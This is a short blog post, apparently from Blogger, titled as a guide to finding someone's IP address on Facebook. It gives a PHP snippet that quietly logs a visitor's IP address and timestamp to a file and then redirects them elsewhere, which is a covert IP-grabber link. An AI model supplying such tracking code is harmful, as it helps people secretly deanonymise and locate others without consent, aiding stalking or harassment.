How to Find Someone;s IP On Facebook ?


PHP FILE CODE 
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("ip_log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);
header( 'Location: https://www.SOMESITE.com') ;



0 comments:

Post a Comment

 
Support : Your Link | Your Link | Your Link
Copyright © 2013. kgcvideo - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger